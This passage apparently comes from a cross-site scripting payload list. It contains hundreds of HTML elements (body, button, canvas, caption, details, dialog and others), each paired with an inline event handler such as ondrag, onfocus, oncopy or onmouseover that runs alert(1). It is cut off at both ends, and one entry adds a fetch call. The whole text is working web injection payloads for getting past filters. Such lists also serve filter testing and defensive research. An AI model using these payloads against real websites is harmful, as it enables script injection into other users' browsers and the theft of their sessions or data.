tabindex=1 onactivate=alert(1)></body> <body id=x tabindex=1 onbeforeactivate=alert(1)></body> <body id=x tabindex=1 onbeforedeactivate=alert(1)></body><input autofocus> <body id=x tabindex=1 ondeactivate=alert(1)></body><input id=y autofocus> <body id=x tabindex=1 onfocus=alert(1)></body> <body id=x tabindex=1 onfocusin=alert(1)></body> <body onafterprint=alert(1)> <body onbeforecopy="alert(1)" contenteditable>test</body> <body onbeforecut="alert(1)" contenteditable>test</body> <body onbeforepaste="alert(1)" contenteditable>test</body> <body onbeforeprint=alert(1)> <body onbeforeunload="location='javascript:alert(1)'"> <body onblur=alert(1) id=x><iframe id=x> <body onclick="alert(1)">test</body> <body oncontextmenu="alert(1)">test</body> <body oncopy="alert(1)" contenteditable>test</body> <body oncut="alert(1)" contenteditable>test</body> <body ondblclick="alert(1)">test</body> <body onerror=alert(1) onload=/> <body onfocusout=alert(1) id=x><iframe id=x> <body onhashchange="alert(1)"> <body onkeydown="alert(1)" contenteditable>test</body> <body onkeypress="alert(1)" contenteditable>test</body> <body onkeyup="alert(1)" contenteditable>test</body> <body onload=alert(1)> <body onmessage=alert(1)> <body onmousedown="alert(1)">test</body> <body onmouseenter="alert(1)">test</body> <body onmouseleave="alert(1)">test</body> <body onmousemove="alert(1)">test</body> <body onmouseout="alert(1)">test</body> <body onmouseover="alert(1)">test</body> <body onmouseup="alert(1)">test</body> <body onpageshow=alert(1)> <body onpaste="alert(1)" contenteditable>test</body> <body onpopstate=alert(1)> <body onresize="alert(1)"> <body onscroll=alert(1)><div style=height:1000px></div><div id=x></div> <body onunhandledrejection=alert(1)><script>fetch('//xyz')</script> <body onwheel=alert(1)> <br draggable="true" ondrag="alert(1)">test</br> <br draggable="true" ondragend="alert(1)">test</br> <br draggable="true" ondragenter="alert(1)">test</br> <br draggable="true" ondragleave="alert(1)">test</br> <br draggable="true" ondragstart="alert(1)">test</br> <br id=x tabindex=1 onactivate=alert(1)></br> <br id=x tabindex=1 onbeforeactivate=alert(1)></br> <br id=x tabindex=1 onbeforedeactivate=alert(1)></br><input autofocus> <br id=x tabindex=1 ondeactivate=alert(1)></br><input id=y autofocus> <br id=x tabindex=1 onfocus=alert(1)></br> <br id=x tabindex=1 onfocusin=alert(1)></br> <br onbeforecopy="alert(1)" contenteditable>test</br> <br onbeforecut="alert(1)" contenteditable>test</br> <br onbeforepaste="alert(1)" contenteditable>test</br> <br onblur=alert(1) tabindex=1 id=x></br><input autofocus> <br onclick="alert(1)">test</br> <br oncontextmenu="alert(1)">test</br> <br oncopy="alert(1)" contenteditable>test</br> <br oncut="alert(1)" contenteditable>test</br> <br ondblclick="alert(1)">test</br> <br onfocusout=alert(1) tabindex=1 id=x></br><input autofocus> <br onkeydown="alert(1)" contenteditable>test</br> <br onkeypress="alert(1)" contenteditable>test</br> <br onkeyup="alert(1)" contenteditable>test</br> <br onmousedown="alert(1)">test</br> <br onmouseenter="alert(1)">test</br> <br onmouseleave="alert(1)">test</br> <br onmousemove="alert(1)">test</br> <br onmouseout="alert(1)">test</br> <br onmouseover="alert(1)">test</br> <br onmouseup="alert(1)">test</br> <br onpaste="alert(1)" contenteditable>test</br> <button autofocus onfocus=alert(1)>test</button> <button autofocus onfocusin=alert(1)>test</button> <button draggable="true" ondrag="alert(1)">test</button> <button draggable="true" ondragend="alert(1)">test</button> <button draggable="true" ondragenter="alert(1)">test</button> <button draggable="true" ondragleave="alert(1)">test</button> <button draggable="true" ondragstart="alert(1)">test</button> <button id=x tabindex=1 onactivate=alert(1)></button> <button id=x tabindex=1 onbeforeactivate=alert(1)></button> <button id=x tabindex=1 onbeforedeactivate=alert(1)></button><input autofocus> <button id=x tabindex=1 ondeactivate=alert(1)></button><input id=y autofocus> <button onbeforecopy="alert(1)" contenteditable>test</button> <button onbeforecut="alert(1)" contenteditable>test</button> <button onbeforepaste="alert(1)" contenteditable>test</button> <button onblur=alert(1) id=x></button><input autofocus> <button onclick="alert(1)">test</button> <button oncontextmenu="alert(1)">test</button> <button oncopy="alert(1)" contenteditable>test</button> <button oncut="alert(1)" contenteditable>test</button> <button ondblclick="alert(1)">test</button> <button onfocusout=alert(1) id=x></button><input autofocus> <button onkeydown="alert(1)" contenteditable>test</button> <button onkeypress="alert(1)" contenteditable>test</button> <button onkeyup="alert(1)" contenteditable>test</button> <button onmousedown="alert(1)">test</button> <button onmouseenter="alert(1)">test</button> <button onmouseleave="alert(1)">test</button> <button onmousemove="alert(1)">test</button> <button onmouseout="alert(1)">test</button> <button onmouseover="alert(1)">test</button> <button onmouseup="alert(1)">test</button> <button onpaste="alert(1)" contenteditable>test</button> <canvas draggable="true" ondrag="alert(1)">test</canvas> <canvas draggable="true" ondragend="alert(1)">test</canvas> <canvas draggable="true" ondragenter="alert(1)">test</canvas> <canvas draggable="true" ondragleave="alert(1)">test</canvas> <canvas draggable="true" ondragstart="alert(1)">test</canvas> <canvas id=x tabindex=1 onactivate=alert(1)></canvas> <canvas id=x tabindex=1 onbeforeactivate=alert(1)></canvas> <canvas id=x tabindex=1 onbeforedeactivate=alert(1)></canvas><input autofocus> <canvas id=x tabindex=1 ondeactivate=alert(1)></canvas><input id=y autofocus> <canvas id=x tabindex=1 onfocus=alert(1)></canvas> <canvas id=x tabindex=1 onfocusin=alert(1)></canvas> <canvas onbeforecopy="alert(1)" contenteditable>test</canvas> <canvas onbeforecut="alert(1)" contenteditable>test</canvas> <canvas onbeforepaste="alert(1)" contenteditable>test</canvas> <canvas onblur=alert(1) tabindex=1 id=x></canvas><input autofocus> <canvas onclick="alert(1)">test</canvas> <canvas oncontextmenu="alert(1)">test</canvas> <canvas oncopy="alert(1)" contenteditable>test</canvas> <canvas oncut="alert(1)" contenteditable>test</canvas> <canvas ondblclick="alert(1)">test</canvas> <canvas onfocusout=alert(1) tabindex=1 id=x></canvas><input autofocus> <canvas onkeydown="alert(1)" contenteditable>test</canvas> <canvas onkeypress="alert(1)" contenteditable>test</canvas> <canvas onkeyup="alert(1)" contenteditable>test</canvas> <canvas onmousedown="alert(1)">test</canvas> <canvas onmouseenter="alert(1)">test</canvas> <canvas onmouseleave="alert(1)">test</canvas> <canvas onmousemove="alert(1)">test</canvas> <canvas onmouseout="alert(1)">test</canvas> <canvas onmouseover="alert(1)">test</canvas> <canvas onmouseup="alert(1)">test</canvas> <canvas onpaste="alert(1)" contenteditable>test</canvas> <caption draggable="true" ondrag="alert(1)">test</caption> <caption draggable="true" ondragend="alert(1)">test</caption> <caption draggable="true" ondragenter="alert(1)">test</caption> <caption draggable="true" ondragleave="alert(1)">test</caption> <caption draggable="true" ondragstart="alert(1)">test</caption> <caption id=x tabindex=1 onactivate=alert(1)></caption> <caption id=x tabindex=1 onbeforeactivate=alert(1)></caption> <caption id=x tabindex=1 onbeforedeactivate=alert(1)></caption><input autofocus> <caption id=x tabindex=1 ondeactivate=alert(1)></caption><input id=y autofocus> <caption id=x tabindex=1 onfocus=alert(1)></caption> <caption id=x tabindex=1 onfocusin=alert(1)></caption> <caption onbeforecopy="alert(1)" contenteditable>test</caption> <caption onbeforecut="alert(1)" contenteditable>test</caption> <caption onbeforepaste="alert(1)" contenteditable>test</caption> <caption onblur=alert(1) tabindex=1 id=x></caption><input autofocus> <caption onclick="alert(1)">test</caption> <caption oncontextmenu="alert(1)">test</caption> <caption oncopy="alert(1)" contenteditable>test</caption> <caption oncut="alert(1)" contenteditable>test</caption> <caption ondblclick="alert(1)">test</caption> <caption onfocusout=alert(1) tabindex=1 id=x></caption><input autofocus> <caption onkeydown="alert(1)" contenteditable>test</caption> <caption onkeypress="alert(1)" contenteditable>test</caption> <caption onkeyup="alert(1)" contenteditable>test</caption> <caption onmousedown="alert(1)">test</caption> <caption onmouseenter="alert(1)">test</caption> <caption onmouseleave="alert(1)">test</caption> <caption onmousemove="alert(1)">test</caption> <caption onmouseout="alert(1)">test</caption> <caption onmouseover="alert(1)">test</caption> <caption onmouseup="alert(1)">test</caption> <caption onpaste="alert(1)" contenteditable>test</caption> <center draggable="true" ondrag="alert(1)">test</center> <center draggable="true" ondragend="alert(1)">test</center> <center draggable="true" ondragenter="alert(1)">test</center> <center draggable="true" ondragleave="alert(1)">test</center> <center draggable="true" ondragstart="alert(1)">test</center> <center id=x tabindex=1 onactivate=alert(1)></center> <center id=x tabindex=1 onbeforeactivate=alert(1)></center> <center id=x tabindex=1 onbeforedeactivate=alert(1)></center><input autofocus> <center id=x tabindex=1 ondeactivate=alert(1)></center><input id=y autofocus> <center id=x tabindex=1 onfocus=alert(1)></center> <center id=x tabindex=1 onfocusin=alert(1)></center> <center onbeforecopy="alert(1)" contenteditable>test</center> <center onbeforecut="alert(1)" contenteditable>test</center> <center onbeforepaste="alert(1)" contenteditable>test</center> <center onblur=alert(1) tabindex=1 id=x></center><input autofocus> <center onclick="alert(1)">test</center> <center oncontextmenu="alert(1)">test</center> <center oncopy="alert(1)" contenteditable>test</center> <center oncut="alert(1)" contenteditable>test</center> <center ondblclick="alert(1)">test</center> <center onfocusout=alert(1) tabindex=1 id=x></center><input autofocus> <center onkeydown="alert(1)" contenteditable>test</center> <center onkeypress="alert(1)" contenteditable>test</center> <center onkeyup="alert(1)" contenteditable>test</center> <center onmousedown="alert(1)">test</center> <center onmouseenter="alert(1)">test</center> <center onmouseleave="alert(1)">test</center> <center onmousemove="alert(1)">test</center> <center onmouseout="alert(1)">test</center> <center onmouseover="alert(1)">test</center> <center onmouseup="alert(1)">test</center> <center onpaste="alert(1)" contenteditable>test</center> <cite draggable="true" ondrag="alert(1)">test</cite> <cite draggable="true" ondragend="alert(1)">test</cite> <cite draggable="true" ondragenter="alert(1)">test</cite> <cite draggable="true" ondragleave="alert(1)">test</cite> <cite draggable="true" ondragstart="alert(1)">test</cite> <cite id=x tabindex=1 onactivate=alert(1)></cite> <cite id=x tabindex=1 onbeforeactivate=alert(1)></cite> <cite id=x tabindex=1 onbeforedeactivate=alert(1)></cite><input autofocus> <cite id=x tabindex=1 ondeactivate=alert(1)></cite><input id=y autofocus> <cite id=x tabindex=1 onfocus=alert(1)></cite> <cite id=x tabindex=1 onfocusin=alert(1)></cite> <cite onbeforecopy="alert(1)" contenteditable>test</cite> <cite onbeforecut="alert(1)" contenteditable>test</cite> <cite onbeforepaste="alert(1)" contenteditable>test</cite> <cite onblur=alert(1) tabindex=1 id=x></cite><input autofocus> <cite onclick="alert(1)">test</cite> <cite oncontextmenu="alert(1)">test</cite> <cite oncopy="alert(1)" contenteditable>test</cite> <cite oncut="alert(1)" contenteditable>test</cite> <cite ondblclick="alert(1)">test</cite> <cite onfocusout=alert(1) tabindex=1 id=x></cite><input autofocus> <cite onkeydown="alert(1)" contenteditable>test</cite> <cite onkeypress="alert(1)" contenteditable>test</cite> <cite onkeyup="alert(1)" contenteditable>test</cite> <cite onmousedown="alert(1)">test</cite> <cite onmouseenter="alert(1)">test</cite> <cite onmouseleave="alert(1)">test</cite> <cite onmousemove="alert(1)">test</cite> <cite onmouseout="alert(1)">test</cite> <cite onmouseover="alert(1)">test</cite> <cite onmouseup="alert(1)">test</cite> <cite onpaste="alert(1)" contenteditable>test</cite> <code draggable="true" ondrag="alert(1)">test</code> <code draggable="true" ondragend="alert(1)">test</code> <code draggable="true" ondragenter="alert(1)">test</code> <code draggable="true" ondragleave="alert(1)">test</code> <code draggable="true" ondragstart="alert(1)">test</code> <code id=x tabindex=1 onactivate=alert(1)></code> <code id=x tabindex=1 onbeforeactivate=alert(1)></code> <code id=x tabindex=1 onbeforedeactivate=alert(1)></code><input autofocus> <code id=x tabindex=1 ondeactivate=alert(1)></code><input id=y autofocus> <code id=x tabindex=1 onfocus=alert(1)></code> <code id=x tabindex=1 onfocusin=alert(1)></code> <code onbeforecopy="alert(1)" contenteditable>test</code> <code onbeforecut="alert(1)" contenteditable>test</code> <code onbeforepaste="alert(1)" contenteditable>test</code> <code onblur=alert(1) tabindex=1 id=x></code><input autofocus> <code onclick="alert(1)">test</code> <code oncontextmenu="alert(1)">test</code> <code oncopy="alert(1)" contenteditable>test</code> <code oncut="alert(1)" contenteditable>test</code> <code ondblclick="alert(1)">test</code> <code onfocusout=alert(1) tabindex=1 id=x></code><input autofocus> <code onkeydown="alert(1)" contenteditable>test</code> <code onkeypress="alert(1)" contenteditable>test</code> <code onkeyup="alert(1)" contenteditable>test</code> <code onmousedown="alert(1)">test</code> <code onmouseenter="alert(1)">test</code> <code onmouseleave="alert(1)">test</code> <code onmousemove="alert(1)">test</code> <code onmouseout="alert(1)">test</code> <code onmouseover="alert(1)">test</code> <code onmouseup="alert(1)">test</code> <code onpaste="alert(1)" contenteditable>test</code> <col draggable="true" ondrag="alert(1)">test</col> <col draggable="true" ondragend="alert(1)">test</col> <col draggable="true" ondragenter="alert(1)">test</col> <col draggable="true" ondragleave="alert(1)">test</col> <col draggable="true" ondragstart="alert(1)">test</col> <col id=x tabindex=1 onactivate=alert(1)></col> <col id=x tabindex=1 onbeforeactivate=alert(1)></col> <col id=x tabindex=1 onbeforedeactivate=alert(1)></col><input autofocus> <col id=x tabindex=1 ondeactivate=alert(1)></col><input id=y autofocus> <col id=x tabindex=1 onfocus=alert(1)></col> <col id=x tabindex=1 onfocusin=alert(1)></col> <col onbeforecopy="alert(1)" contenteditable>test</col> <col onbeforecut="alert(1)" contenteditable>test</col> <col onbeforepaste="alert(1)" contenteditable>test</col> <col onblur=alert(1) tabindex=1 id=x></col><input autofocus> <col onclick="alert(1)">test</col> <col oncontextmenu="alert(1)">test</col> <col oncopy="alert(1)" contenteditable>test</col> <col oncut="alert(1)" contenteditable>test</col> <col ondblclick="alert(1)">test</col> <col onfocusout=alert(1) tabindex=1 id=x></col><input autofocus> <col onkeydown="alert(1)" contenteditable>test</col> <col onkeypress="alert(1)" contenteditable>test</col> <col onkeyup="alert(1)" contenteditable>test</col> <col onmousedown="alert(1)">test</col> <col onmouseenter="alert(1)">test</col> <col onmouseleave="alert(1)">test</col> <col onmousemove="alert(1)">test</col> <col onmouseout="alert(1)">test</col> <col onmouseover="alert(1)">test</col> <col onmouseup="alert(1)">test</col> <col onpaste="alert(1)" contenteditable>test</col> <colgroup draggable="true" ondrag="alert(1)">test</colgroup> <colgroup draggable="true" ondragend="alert(1)">test</colgroup> <colgroup draggable="true" ondragenter="alert(1)">test</colgroup> <colgroup draggable="true" ondragleave="alert(1)">test</colgroup> <colgroup draggable="true" ondragstart="alert(1)">test</colgroup> <colgroup id=x tabindex=1 onactivate=alert(1)></colgroup> <colgroup id=x tabindex=1 onbeforeactivate=alert(1)></colgroup> <colgroup id=x tabindex=1 onbeforedeactivate=alert(1)></colgroup><input autofocus> <colgroup id=x tabindex=1 ondeactivate=alert(1)></colgroup><input id=y autofocus> <colgroup id=x tabindex=1 onfocus=alert(1)></colgroup> <colgroup id=x tabindex=1 onfocusin=alert(1)></colgroup> <colgroup onbeforecopy="alert(1)" contenteditable>test</colgroup> <colgroup onbeforecut="alert(1)" contenteditable>test</colgroup> <colgroup onbeforepaste="alert(1)" contenteditable>test</colgroup> <colgroup onblur=alert(1) tabindex=1 id=x></colgroup><input autofocus> <colgroup onclick="alert(1)">test</colgroup> <colgroup oncontextmenu="alert(1)">test</colgroup> <colgroup oncopy="alert(1)" contenteditable>test</colgroup> <colgroup oncut="alert(1)" contenteditable>test</colgroup> <colgroup ondblclick="alert(1)">test</colgroup> <colgroup onfocusout=alert(1) tabindex=1 id=x></colgroup><input autofocus> <colgroup onkeydown="alert(1)" contenteditable>test</colgroup> <colgroup onkeypress="alert(1)" contenteditable>test</colgroup> <colgroup onkeyup="alert(1)" contenteditable>test</colgroup> <colgroup onmousedown="alert(1)">test</colgroup> <colgroup onmouseenter="alert(1)">test</colgroup> <colgroup onmouseleave="alert(1)">test</colgroup> <colgroup onmousemove="alert(1)">test</colgroup> <colgroup onmouseout="alert(1)">test</colgroup> <colgroup onmouseover="alert(1)">test</colgroup> <colgroup onmouseup="alert(1)">test</colgroup> <colgroup onpaste="alert(1)" contenteditable>test</colgroup> <command draggable="true" ondrag="alert(1)">test</command> <command draggable="true" ondragend="alert(1)">test</command> <command draggable="true" ondragenter="alert(1)">test</command> <command draggable="true" ondragleave="alert(1)">test</command> <command draggable="true" ondragstart="alert(1)">test</command> <command id=x tabindex=1 onactivate=alert(1)></command> <command id=x tabindex=1 onbeforeactivate=alert(1)></command> <command id=x tabindex=1 onbeforedeactivate=alert(1)></command><input autofocus> <command id=x tabindex=1 ondeactivate=alert(1)></command><input id=y autofocus> <command id=x tabindex=1 onfocus=alert(1)></command> <command id=x tabindex=1 onfocusin=alert(1)></command> <command onbeforecopy="alert(1)" contenteditable>test</command> <command onbeforecut="alert(1)" contenteditable>test</command> <command onbeforepaste="alert(1)" contenteditable>test</command> <command onblur=alert(1) tabindex=1 id=x></command><input autofocus> <command onclick="alert(1)">test</command> <command oncontextmenu="alert(1)">test</command> <command oncopy="alert(1)" contenteditable>test</command> <command oncut="alert(1)" contenteditable>test</command> <command ondblclick="alert(1)">test</command> <command onfocusout=alert(1) tabindex=1 id=x></command><input autofocus> <command onkeydown="alert(1)" contenteditable>test</command> <command onkeypress="alert(1)" contenteditable>test</command> <command onkeyup="alert(1)" contenteditable>test</command> <command onmousedown="alert(1)">test</command> <command onmouseenter="alert(1)">test</command> <command onmouseleave="alert(1)">test</command> <command onmousemove="alert(1)">test</command> <command onmouseout="alert(1)">test</command> <command onmouseover="alert(1)">test</command> <command onmouseup="alert(1)">test</command> <command onpaste="alert(1)" contenteditable>test</command> <content draggable="true" ondrag="alert(1)">test</content> <content draggable="true" ondragend="alert(1)">test</content> <content draggable="true" ondragenter="alert(1)">test</content> <content draggable="true" ondragleave="alert(1)">test</content> <content draggable="true" ondragstart="alert(1)">test</content> <content id=x tabindex=1 onactivate=alert(1)></content> <content id=x tabindex=1 onbeforeactivate=alert(1)></content> <content id=x tabindex=1 onbeforedeactivate=alert(1)></content><input autofocus> <content id=x tabindex=1 ondeactivate=alert(1)></content><input id=y autofocus> <content id=x tabindex=1 onfocus=alert(1)></content> <content id=x tabindex=1 onfocusin=alert(1)></content> <content onbeforecopy="alert(1)" contenteditable>test</content> <content onbeforecut="alert(1)" contenteditable>test</content> <content onbeforepaste="alert(1)" contenteditable>test</content> <content onblur=alert(1) tabindex=1 id=x></content><input autofocus> <content onclick="alert(1)">test</content> <content oncontextmenu="alert(1)">test</content> <content oncopy="alert(1)" contenteditable>test</content> <content oncut="alert(1)" contenteditable>test</content> <content ondblclick="alert(1)">test</content> <content onfocusout=alert(1) tabindex=1 id=x></content><input autofocus> <content onkeydown="alert(1)" contenteditable>test</content> <content onkeypress="alert(1)" contenteditable>test</content> <content onkeyup="alert(1)" contenteditable>test</content> <content onmousedown="alert(1)">test</content> <content onmouseenter="alert(1)">test</content> <content onmouseleave="alert(1)">test</content> <content onmousemove="alert(1)">test</content> <content onmouseout="alert(1)">test</content> <content onmouseover="alert(1)">test</content> <content onmouseup="alert(1)">test</content> <content onpaste="alert(1)" contenteditable>test</content> <data draggable="true" ondrag="alert(1)">test</data> <data draggable="true" ondragend="alert(1)">test</data> <data draggable="true" ondragenter="alert(1)">test</data> <data draggable="true" ondragleave="alert(1)">test</data> <data draggable="true" ondragstart="alert(1)">test</data> <data id=x tabindex=1 onactivate=alert(1)></data> <data id=x tabindex=1 onbeforeactivate=alert(1)></data> <data id=x tabindex=1 onbeforedeactivate=alert(1)></data><input autofocus> <data id=x tabindex=1 ondeactivate=alert(1)></data><input id=y autofocus> <data id=x tabindex=1 onfocus=alert(1)></data> <data id=x tabindex=1 onfocusin=alert(1)></data> <data onbeforecopy="alert(1)" contenteditable>test</data> <data onbeforecut="alert(1)" contenteditable>test</data> <data onbeforepaste="alert(1)" contenteditable>test</data> <data onblur=alert(1) tabindex=1 id=x></data><input autofocus> <data onclick="alert(1)">test</data> <data oncontextmenu="alert(1)">test</data> <data oncopy="alert(1)" contenteditable>test</data> <data oncut="alert(1)" contenteditable>test</data> <data ondblclick="alert(1)">test</data> <data onfocusout=alert(1) tabindex=1 id=x></data><input autofocus> <data onkeydown="alert(1)" contenteditable>test</data> <data onkeypress="alert(1)" contenteditable>test</data> <data onkeyup="alert(1)" contenteditable>test</data> <data onmousedown="alert(1)">test</data> <data onmouseenter="alert(1)">test</data> <data onmouseleave="alert(1)">test</data> <data onmousemove="alert(1)">test</data> <data onmouseout="alert(1)">test</data> <data onmouseover="alert(1)">test</data> <data onmouseup="alert(1)">test</data> <data onpaste="alert(1)" contenteditable>test</data> <datalist draggable="true" ondrag="alert(1)">test</datalist> <datalist draggable="true" ondragend="alert(1)">test</datalist> <datalist draggable="true" ondragenter="alert(1)">test</datalist> <datalist draggable="true" ondragleave="alert(1)">test</datalist> <datalist draggable="true" ondragstart="alert(1)">test</datalist> <datalist id=x tabindex=1 onactivate=alert(1)></datalist> <datalist id=x tabindex=1 onbeforeactivate=alert(1)></datalist> <datalist id=x tabindex=1 onbeforedeactivate=alert(1)></datalist><input autofocus> <datalist id=x tabindex=1 ondeactivate=alert(1)></datalist><input id=y autofocus> <datalist id=x tabindex=1 onfocus=alert(1)></datalist> <datalist id=x tabindex=1 onfocusin=alert(1)></datalist> <datalist onbeforecopy="alert(1)" contenteditable>test</datalist> <datalist onbeforecut="alert(1)" contenteditable>test</datalist> <datalist onbeforepaste="alert(1)" contenteditable>test</datalist> <datalist onblur=alert(1) tabindex=1 id=x></datalist><input autofocus> <datalist onclick="alert(1)">test</datalist> <datalist oncontextmenu="alert(1)">test</datalist> <datalist oncopy="alert(1)" contenteditable>test</datalist> <datalist oncut="alert(1)" contenteditable>test</datalist> <datalist ondblclick="alert(1)">test</datalist> <datalist onfocusout=alert(1) tabindex=1 id=x></datalist><input autofocus> <datalist onkeydown="alert(1)" contenteditable>test</datalist> <datalist onkeypress="alert(1)" contenteditable>test</datalist> <datalist onkeyup="alert(1)" contenteditable>test</datalist> <datalist onmousedown="alert(1)">test</datalist> <datalist onmouseenter="alert(1)">test</datalist> <datalist onmouseleave="alert(1)">test</datalist> <datalist onmousemove="alert(1)">test</datalist> <datalist onmouseout="alert(1)">test</datalist> <datalist onmouseover="alert(1)">test</datalist> <datalist onmouseup="alert(1)">test</datalist> <datalist onpaste="alert(1)" contenteditable>test</datalist> <dd draggable="true" ondrag="alert(1)">test</dd> <dd draggable="true" ondragend="alert(1)">test</dd> <dd draggable="true" ondragenter="alert(1)">test</dd> <dd draggable="true" ondragleave="alert(1)">test</dd> <dd draggable="true" ondragstart="alert(1)">test</dd> <dd id=x tabindex=1 onactivate=alert(1)></dd> <dd id=x tabindex=1 onbeforeactivate=alert(1)></dd> <dd id=x tabindex=1 onbeforedeactivate=alert(1)></dd><input autofocus> <dd id=x tabindex=1 ondeactivate=alert(1)></dd><input id=y autofocus> <dd id=x tabindex=1 onfocus=alert(1)></dd> <dd id=x tabindex=1 onfocusin=alert(1)></dd> <dd onbeforecopy="alert(1)" contenteditable>test</dd> <dd onbeforecut="alert(1)" contenteditable>test</dd> <dd onbeforepaste="alert(1)" contenteditable>test</dd> <dd onblur=alert(1) tabindex=1 id=x></dd><input autofocus> <dd onclick="alert(1)">test</dd> <dd oncontextmenu="alert(1)">test</dd> <dd oncopy="alert(1)" contenteditable>test</dd> <dd oncut="alert(1)" contenteditable>test</dd> <dd ondblclick="alert(1)">test</dd> <dd onfocusout=alert(1) tabindex=1 id=x></dd><input autofocus> <dd onkeydown="alert(1)" contenteditable>test</dd> <dd onkeypress="alert(1)" contenteditable>test</dd> <dd onkeyup="alert(1)" contenteditable>test</dd> <dd onmousedown="alert(1)">test</dd> <dd onmouseenter="alert(1)">test</dd> <dd onmouseleave="alert(1)">test</dd> <dd onmousemove="alert(1)">test</dd> <dd onmouseout="alert(1)">test</dd> <dd onmouseover="alert(1)">test</dd> <dd onmouseup="alert(1)">test</dd> <dd onpaste="alert(1)" contenteditable>test</dd> <del draggable="true" ondrag="alert(1)">test</del> <del draggable="true" ondragend="alert(1)">test</del> <del draggable="true" ondragenter="alert(1)">test</del> <del draggable="true" ondragleave="alert(1)">test</del> <del draggable="true" ondragstart="alert(1)">test</del> <del id=x tabindex=1 onactivate=alert(1)></del> <del id=x tabindex=1 onbeforeactivate=alert(1)></del> <del id=x tabindex=1 onbeforedeactivate=alert(1)></del><input autofocus> <del id=x tabindex=1 ondeactivate=alert(1)></del><input id=y autofocus> <del id=x tabindex=1 onfocus=alert(1)></del> <del id=x tabindex=1 onfocusin=alert(1)></del> <del onbeforecopy="alert(1)" contenteditable>test</del> <del onbeforecut="alert(1)" contenteditable>test</del> <del onbeforepaste="alert(1)" contenteditable>test</del> <del onblur=alert(1) tabindex=1 id=x></del><input autofocus> <del onclick="alert(1)">test</del> <del oncontextmenu="alert(1)">test</del> <del oncopy="alert(1)" contenteditable>test</del> <del oncut="alert(1)" contenteditable>test</del> <del ondblclick="alert(1)">test</del> <del onfocusout=alert(1) tabindex=1 id=x></del><input autofocus> <del onkeydown="alert(1)" contenteditable>test</del> <del onkeypress="alert(1)" contenteditable>test</del> <del onkeyup="alert(1)" contenteditable>test</del> <del onmousedown="alert(1)">test</del> <del onmouseenter="alert(1)">test</del> <del onmouseleave="alert(1)">test</del> <del onmousemove="alert(1)">test</del> <del onmouseout="alert(1)">test</del> <del onmouseover="alert(1)">test</del> <del onmouseup="alert(1)">test</del> <del onpaste="alert(1)" contenteditable>test</del> <details draggable="true" ondrag="alert(1)">test</details> <details draggable="true" ondragend="alert(1)">test</details> <details draggable="true" ondragenter="alert(1)">test</details> <details draggable="true" ondragleave="alert(1)">test</details> <details draggable="true" ondragstart="alert(1)">test</details> <details id=x tabindex=1 onactivate=alert(1)></details> <details id=x tabindex=1 onbeforeactivate=alert(1)></details> <details id=x tabindex=1 onbeforedeactivate=alert(1)></details><input autofocus> <details id=x tabindex=1 ondeactivate=alert(1)></details><input id=y autofocus> <details id=x tabindex=1 onfocus=alert(1)></details> <details id=x tabindex=1 onfocusin=alert(1)></details> <details onbeforecopy="alert(1)" contenteditable>test</details> <details onbeforecut="alert(1)" contenteditable>test</details> <details onbeforepaste="alert(1)" contenteditable>test</details> <details onblur=alert(1) tabindex=1 id=x></details><input autofocus> <details onclick="alert(1)">test</details> <details oncontextmenu="alert(1)">test</details> <details oncopy="alert(1)" contenteditable>test</details> <details oncut="alert(1)" contenteditable>test</details> <details ondblclick="alert(1)">test</details> <details onfocusout=alert(1) tabindex=1 id=x></details><input autofocus> <details onkeydown="alert(1)" contenteditable>test</details> <details onkeypress="alert(1)" contenteditable>test</details> <details onkeyup="alert(1)" contenteditable>test</details> <details onmousedown="alert(1)">test</details> <details onmouseenter="alert(1)">test</details> <details onmouseleave="alert(1)">test</details> <details onmousemove="alert(1)">test</details> <details onmouseout="alert(1)">test</details> <details onmouseover="alert(1)">test</details> <details onmouseup="alert(1)">test</details> <details onpaste="alert(1)" contenteditable>test</details> <details ontoggle=alert(1) open>test</details> <dfn draggable="true" ondrag="alert(1)">test</dfn> <dfn draggable="true" ondragend="alert(1)">test</dfn> <dfn draggable="true" ondragenter="alert(1)">test</dfn> <dfn draggable="true" ondragleave="alert(1)">test</dfn> <dfn draggable="true" ondragstart="alert(1)">test</dfn> <dfn id=x tabindex=1 onactivate=alert(1)></dfn> <dfn id=x tabindex=1 onbeforeactivate=alert(1)></dfn> <dfn id=x tabindex=1 onbeforedeactivate=alert(1)></dfn><input autofocus> <dfn id=x tabindex=1 ondeactivate=alert(1)></dfn><input id=y autofocus> <dfn id=x tabindex=1 onfocus=alert(1)></dfn> <dfn id=x tabindex=1 onfocusin=alert(1)></dfn> <dfn onbeforecopy="alert(1)" contenteditable>test</dfn> <dfn onbeforecut="alert(1)" contenteditable>test</dfn> <dfn onbeforepaste="alert(1)" contenteditable>test</dfn> <dfn onblur=alert(1) tabindex=1 id=x></dfn><input autofocus> <dfn onclick="alert(1)">test</dfn> <dfn oncontextmenu="alert(1)">test</dfn> <dfn oncopy="alert(1)" contenteditable>test</dfn> <dfn oncut="alert(1)" contenteditable>test</dfn> <dfn ondblclick="alert(1)">test</dfn> <dfn onfocusout=alert(1) tabindex=1 id=x></dfn><input autofocus> <dfn onkeydown="alert(1)" contenteditable>test</dfn> <dfn onkeypress="alert(1)" contenteditable>test</dfn> <dfn onkeyup="alert(1)" contenteditable>test</dfn> <dfn onmousedown="alert(1)">test</dfn> <dfn onmouseenter="alert(1)">test</dfn> <dfn onmouseleave="alert(1)">test</dfn> <dfn onmousemove="alert(1)">test</dfn> <dfn onmouseout="alert(1)">test</dfn> <dfn onmouseover="alert(1)">test</dfn> <dfn onmouseup="alert(1)">test</dfn> <dfn onpaste="alert(1)" contenteditable>test</dfn> <dialog draggable="true" ondrag="alert(1)">test</dialog> <dialog draggable="true" ondragend="alert(1)">test</dialog> <dialog draggable="true" ondragenter="alert(1)">test</dialog> <dialog draggable="true" ondragleave="alert(1)">test</dialog> <dialog draggable="true" ondragstart="alert(1)">test</dialog> <dialog id=x tabindex=1 onactivate=alert(1)></dialog> <dialog id=x tabindex=1 onbeforeactivate=alert(1)></dialog> <dialog id=x tabindex=1 onbeforedeactivate=alert(1)></dialog><input autofocus> <dialog id=x tabindex=1 ondeactivate=alert(1)></dialog><input id=y autofocus> <dialog id=x tabindex=1 onfocus=alert(1)></dialog> <dialog id=x tabindex=1 onfocusin=alert(1)></dialog> <dialog onbeforecopy="alert(1)" contenteditable>test</dialog> <dialog onbeforecut="alert(1)" contenteditable>test</dialog> <dialog onbeforepaste="alert(1)" contenteditable>test</dialog> <dialog onblur=alert(1) tabindex=1 id=x></dialog><input autofocus> <dialog onclick="alert(1)">test</dialog> <dialog oncontextmenu="alert(1)">test</dialog> <dialog oncopy="alert(1)" contenteditable>test</dialog> <dialog 